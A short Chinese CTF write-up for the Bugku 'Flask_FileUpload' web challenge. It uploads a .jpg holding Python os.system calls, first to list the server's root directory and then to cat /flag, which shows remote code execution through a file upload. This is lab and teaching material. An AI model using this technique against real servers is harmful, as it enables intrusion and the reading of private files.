技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
梦650
15 小时前
JavaScript ES5 + ES6+ 字符串 (String) 所有方法大全
前端·javascript·es6
馨谙
15 小时前
面试题----用户,组,su,su-,sudo,sudo-,nologin shell
java·前端·数据库
cuckooman
15 小时前
uv设置国内源
python·pip·uv·镜像源
一见
15 小时前
如何安装 dlib 和 OpenCV(不带 Python 绑定)
人工智能·python·opencv
王同学 学出来
15 小时前
React案例实操(二)
前端·react.js·前端框架
weixin_42777161
16 小时前
Vite 与 Webpack 模块解析差异
前端·webpack·node.js
永远是我的最爱
16 小时前
基于ASP.NET的图书管理系统的设计与实现
前端·后端·sql·visual studio
广州华水科技
16 小时前
单北斗GNSS技术在变形监测中的应用及其位移监测优势解析
前端
刘晓倩
16 小时前
Python内置函数-hasattr()
前端·javascript·python
逆境清醒
16 小时前
Python中的常量
开发语言·python·青少年编程
热门推荐
01GitHub 镜像站点022025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)032025年大语言模型技术全景报告04Linux下V2Ray安装配置指南05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06UV安装并设置国内源07Claude Code Skills 实用使用手册08Labelme从安装到标注:零基础完整指南09AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南10BongoCat - 跨平台键盘猫动画工具